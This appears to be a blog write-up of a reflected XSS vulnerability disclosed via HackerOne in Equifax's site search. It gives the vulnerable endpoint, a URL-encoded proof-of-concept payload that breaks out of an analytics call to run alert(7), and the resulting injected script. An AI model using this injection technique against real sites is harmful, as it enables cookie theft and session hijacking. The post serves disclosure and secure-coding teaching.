In December 2022, a security researcher reported a reflected cross-site scripting (XSS) vulnerability affecting the search functionality on the Equifax website. The issue was submitted through the company’s vulnerability disclosure program on HackerOne.
Vulnerability Description
The vulnerable endpoint was:
https://www.equifax.com/personal/help/search?search=<input>
When a user entered a search term, the application reflected that value directly into a JavaScript function on the returned page. For example, the word broook
appeared in the following script block:
<script type="text/javascript">
window.onload = function(e){
Analytics.trackEvent('emptySearch',{internalSearchTerm: "broook" , numOfSearchResultsReturned: 0});
}
</script>
Because the search parameter was not properly sanitized, an attacker could inject arbitrary JavaScript code.
Proof of Concept
The researcher supplied a payload that modified the parameters of the Analytics.trackEvent
function:
%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b
When decoded, this payload injected an array mapping function that executed alert(7)
. The final vulnerable script looked like this:
<script type="text/javascript">
window.onload = function(e){
Analytics.trackEvent('SEARCHRETURNED',{internalSearchTerm: "" , internalSearchTerm: [7].map(alert) , numOfSearchResultsReturned: "b" , numOfSearchResultsReturned: 167});
}
</script>
This confirmed that the input was being executed as JavaScript in the browser.
Impact
A successful exploit would allow an attacker to execute arbitrary JavaScript in the context of a victim’s browser session. This could lead to theft of cookies, session hijacking, or other malicious actions depending on the attacker’s goals.
Conclusion
This case highlights the risks of directly embedding user-controlled input into JavaScript code without proper sanitization or encoding. Reflected XSS vulnerabilities are still common and can have serious consequences when exploited on high-profile sites. Proper input handling and output encoding remain essential defenses.
Top comments (0)